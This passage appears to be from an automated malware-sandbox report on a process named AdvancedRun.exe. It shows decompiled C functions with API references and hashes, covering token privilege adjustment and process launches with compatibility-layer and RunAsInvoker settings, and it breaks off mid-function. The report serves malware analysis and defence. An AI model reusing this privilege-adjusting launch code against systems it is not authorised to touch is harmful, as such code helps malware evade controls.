                                                                                                                0x00405521
                                                                                                                0x00405527
                                                                                                                0x0040552b
                                                                                                                0x0040552e
                                                                                                                0x0040553f
                                                                                                                0x00405530
                                                                                                                0x00405532
                                                                                                                0x00405532
                                                                                                                0x00405556
                                                                                                                0x00405561
                                                                                                                0x0040556e
                                                                                                                0x00405571
                                                                                                                0x00405578
                                                                                                                0x0040557e

                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                0x00405adf
                                                                                                                0x00405ae6
                                                                                                                0x00405af5
                                                                                                                0x00405af6
                                                                                                                0x00405afb
                                                                                                                0x00405b00
                                                                                                                0x00405b0a
                                                                                                                0x00405b18
                                                                                                                0x00405b19
                                                                                                                0x00405b1e
                                                                                                                0x00405b2c
                                                                                                                0x00405b2d
                                                                                                                0x00405b36
                                                                                                                0x00405b37
                                                                                                                0x00405b3c
                                                                                                                0x00405b4a
                                                                                                                0x00405b4b
                                                                                                                0x00405b54
                                                                                                                0x00405b55
                                                                                                                0x00405b5a
                                                                                                                0x00405b68
                                                                                                                0x00405b69
                                                                                                                0x00405b72
                                                                                                                0x00405b73
                                                                                                                0x00405b7b
                                                                                                                0x00000000
                                                                                                                0x00405b7b
                                                                                                                0x00405b80

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: AdvancedRun.exe PID: 6332 Parent PID: 5792 AdvancedRun.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                0x00408fc9
                                                                                                                0x00408fd0
                                                                                                                0x00408fe8
                                                                                                                0x00000000
                                                                                                                0x00408fea
                                                                                                                0x00408ff4
                                                                                                                0x00409001
                                                                                                                0x00409003
                                                                                                                0x0040900c
                                                                                                                0x0040900e
                                                                                                                0x00409010
                                                                                                                0x0040901a
                                                                                                                0x0040901a
                                                                                                                0x00409010
                                                                                                                0x0040901f
                                                                                                                0x00409026
                                                                                                                0x0040902d
                                                                                                                0x00409030
                                                                                                                0x00409035
                                                                                                                0x00409037
                                                                                                                0x00409040
                                                                                                                0x00409042
                                                                                                                0x00409044
                                                                                                                0x00409051
                                                                                                                0x00409051
                                                                                                                0x00409044
                                                                                                                0x00409053
                                                                                                                0x0040905e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                0x004022d5
                                                                                                                0x004022dd
                                                                                                                0x004022e7
                                                                                                                0x004022ec
                                                                                                                0x004022f7
                                                                                                                0x004022fa
                                                                                                                0x004022fd
                                                                                                                0x00402300
                                                                                                                0x00402307
                                                                                                                0x0040230d
                                                                                                                0x0040230e
                                                                                                                0x00402318
                                                                                                                0x00402321
                                                                                                                0x00402324
                                                                                                                0x00402327
                                                                                                                0x0040232a
                                                                                                                0x0040232d
                                                                                                                0x00402334
                                                                                                                0x00402337
                                                                                                                0x0040233e
                                                                                                                0x0040234f
                                                                                                                0x00402356
                                                                                                                0x0040235b
                                                                                                                0x0040235e
                                                                                                                0x0040236d
                                                                                                                0x00402374
                                                                                                                0x0040237e
                                                                                                                0x00402395
                                                                                                                0x004023a0
                                                                                                                0x004023a0
                                                                                                                0x004023ac
                                                                                                                0x004023cf
                                                                                                                0x004023d2
                                                                                                                0x004023d9
                                                                                                                0x004023de
                                                                                                                0x004023f6
                                                                                                                0x00402403
                                                                                                                0x00402414
                                                                                                                0x00402419
                                                                                                                0x00402403
                                                                                                                0x0040241a
                                                                                                                0x00402423
                                                                                                                0x00402458
                                                                                                                0x0040245d
                                                                                                                0x00402464
                                                                                                                0x00402467
                                                                                                                0x00402468
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402425
                                                                                                                0x00402428
                                                                                                                0x0040242b
                                                                                                                0x00402433
                                                                                                                0x00402434
                                                                                                                0x00402473
                                                                                                                0x00402473
                                                                                                                0x0040247c
                                                                                                                0x00402481
                                                                                                                0x00402488
                                                                                                                0x00402488
                                                                                                                0x00402495
                                                                                                                0x0040249a
                                                                                                                0x004024b7
                                                                                                                0x004024be
                                                                                                                0x004024cd
                                                                                                                0x004024d1
                                                                                                                0x004024ed
                                                                                                                0x004024f0
                                                                                                                0x00402506
                                                                                                                0x0040250b
                                                                                                                0x00402512
                                                                                                                0x00402518
                                                                                                                0x00402519
                                                                                                                0x0040251e
                                                                                                                0x00402524
                                                                                                                0x00402527
                                                                                                                0x0040252b
                                                                                                                0x00402530
                                                                                                                0x00402531
                                                                                                                0x00402531
                                                                                                                0x0040253d
                                                                                                                0x0040255a
                                                                                                                0x00402561
                                                                                                                0x00402570
                                                                                                                0x00402574
                                                                                                                0x00402590
                                                                                                                0x00402593
                                                                                                                0x004025a9
                                                                                                                0x004025ae
                                                                                                                0x004025b5
                                                                                                                0x004025bb
                                                                                                                0x004025bc
                                                                                                                0x004025c1
                                                                                                                0x004025c7
                                                                                                                0x004025ca
                                                                                                                0x004025cd
                                                                                                                0x004025ce
                                                                                                                0x004025d4
                                                                                                                0x004025d4
                                                                                                                0x004025da
                                                                                                                0x004025e3
                                                                                                                0x004025eb
                                                                                                                0x00402633
                                                                                                                0x004025fb
                                                                                                                0x00402608
                                                                                                                0x0040260f
                                                                                                                0x00402614
                                                                                                                0x00402624
                                                                                                                0x00402630
                                                                                                                0x00402630
                                                                                                                0x0040263a
                                                                                                                0x0040263b
                                                                                                                0x00402646
                                                                                                                0x0040264b
                                                                                                                0x0040264c
                                                                                                                0x0040265a
                                                                                                                0x0040265a
                                                                                                                0x0040265d
                                                                                                                0x00402666
                                                                                                                0x00402668
                                                                                                                0x00402668
                                                                                                                0x00402672
                                                                                                                0x00402675
                                                                                                                0x0040267e
                                                                                                                0x0040267e
                                                                                                                0x00402683
                                                                                                                0x0040268b
                                                                                                                0x0040269e
                                                                                                                0x0040269e
                                                                                                                0x004026a3
                                                                                                                0x004026ac
                                                                                                                0x004026b5
                                                                                                                0x004026b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004026ba
                                                                                                                0x00000000
                                                                                                                0x004026ae
                                                                                                                0x004026ae
                                                                                                                0x004026bf
                                                                                                                0x004026c1
                                                                                                                0x004026c6
                                                                                                                0x004026cc
                                                                                                                0x004026d5
                                                                                                                0x004026db
                                                                                                                0x004026e4
                                                                                                                0x004026ea
                                                                                                                0x004026f3
                                                                                                                0x004026f9
                                                                                                                0x00402707
                                                                                                                0x00402707
                                                                                                                0x0040270d
                                                                                                                0x00402710
                                                                                                                0x0040276d
                                                                                                                0x00402770
                                                                                                                0x0040280b
                                                                                                                0x0040280e
                                                                                                                0x00402813
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402819
                                                                                                                0x0040281f
                                                                                                                0x00402836
                                                                                                                0x00402841
                                                                                                                0x00402846
                                                                                                                0x0040284a
                                                                                                                0x00402851
                                                                                                                0x00402857
                                                                                                                0x00402860
                                                                                                                0x00402865
                                                                                                                0x00402876
                                                                                                                0x00402879
                                                                                                                0x00402888
                                                                                                                0x00402888
                                                                                                                0x00402857
                                                                                                                0x00402891
                                                                                                                0x0040289c
                                                                                                                0x0040289c
                                                                                                                0x00402779
                                                                                                                0x00402784
                                                                                                                0x0040278d
                                                                                                                0x004027a4
                                                                                                                0x004027b3
                                                                                                                0x004027b8
                                                                                                                0x004027bb
                                                                                                                0x004027bf
                                                                                                                0x004027c6
                                                                                                                0x004027c6
                                                                                                                0x004027d1
                                                                                                                0x004027d6
                                                                                                                0x004027d9
                                                                                                                0x004027db
                                                                                                                0x004027e2
                                                                                                                0x004027e4
                                                                                                                0x004027e4
                                                                                                                0x004027e7
                                                                                                                0x004027f4
                                                                                                                0x004027fc
                                                                                                                0x00402801
                                                                                                                0x00402801
                                                                                                                0x00402803
                                                                                                                0x00402803
                                                                                                                0x00402806
                                                                                                                0x00000000
                                                                                                                0x00402806
                                                                                                                0x00402715
                                                                                                                0x00402729
                                                                                                                0x0040272e
                                                                                                                0x00402731
                                                                                                                0x00402738
                                                                                                                0x00402738
                                                                                                                0x00402743
                                                                                                                0x00402748
                                                                                                                0x0040274d
                                                                                                                0x00402754
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402759
                                                                                                                0x00402763
                                                                                                                0x00000000
                                                                                                                0x00402763
                                                                                                                0x004026fb
                                                                                                                0x00402700
                                                                                                                0x00402702
                                                                                                                0x00000000
                                                                                                                0x00402702
                                                                                                                0x004026ec
                                                                                                                0x00000000
                                                                                                                0x004026ec
                                                                                                                0x004026dd
                                                                                                                0x00000000
                                                                                                                0x004026dd
                                                                                                                0x004026ce
                                                                                                                0x00000000
                                                                                                                0x004026ce
                                                                                                                0x004026ac
                                                                                                                0x00402443
                                                                                                                0x0040246a
                                                                                                                0x00402470
                                                                                                                0x00000000
                                                                                                                0x00402470

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
